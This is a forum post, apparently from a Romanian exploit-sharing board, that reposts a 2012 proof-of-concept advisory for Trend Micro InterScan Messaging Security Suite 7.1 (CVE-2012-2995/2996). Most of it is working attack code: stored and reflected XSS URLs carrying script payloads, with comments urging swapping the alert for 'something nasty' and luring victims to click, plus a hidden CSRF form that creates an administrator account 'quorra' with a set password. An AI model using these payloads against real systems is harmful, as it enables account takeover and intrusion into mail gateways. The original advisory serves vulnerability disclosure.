Jump to content
DarkyAngel

Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF

By DarkyAngel, in Exploituri

Recommended Posts

DarkyAngel Newbie

DarkyAngel

Posted
Posted

Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF

# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF
# Date: 13/09/2012
# Exploit Author: modpr0be (modpr0be[at]spentera.com)
# Vendor Homepage: http://www.trendmicro.com
# Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip
# Version: 7.1-Build_Win32_1394
# Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)
# CVE : CVE-2012-2995, CVE-2012-2996

# Software Description
# TrendMicro Interscan Messaging Security is the industry’s most comprehensive 
# mail gateway security. Choose state-of-the-art software or a hybrid solution 
# with on-premise virtual appliance and optional cloud pre-filter that blocks 
# the vast majority of spam and malware outside your network. Plus our Data 
# Privacy and Encryption Module secure outbound data to ensure privacy and 
# regulatory compliance.

# Vulnerability Overview
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) 
# and cross-site request forgery (CWE-352) vulnerabilities.

# Proof of Concept
# Persistent/Stored XSS
# this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word
# will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

# Non-persistent/Reflected XSS
# This is non-persistent XSS, you might lure target user to click this link 
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

# Cross-Site Request Forgery
# This POC should be targeted to user with admin privilege
# It will add admin user with user quorra, and password quorra.123
# Target victim must be authenticated when perform this POC
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

# References
# http://www.spentera.com/advisories/2012/SPN-05-2012.html
# http://www.kb.cert.org/vuls/id/471364
# http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

Sursa

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...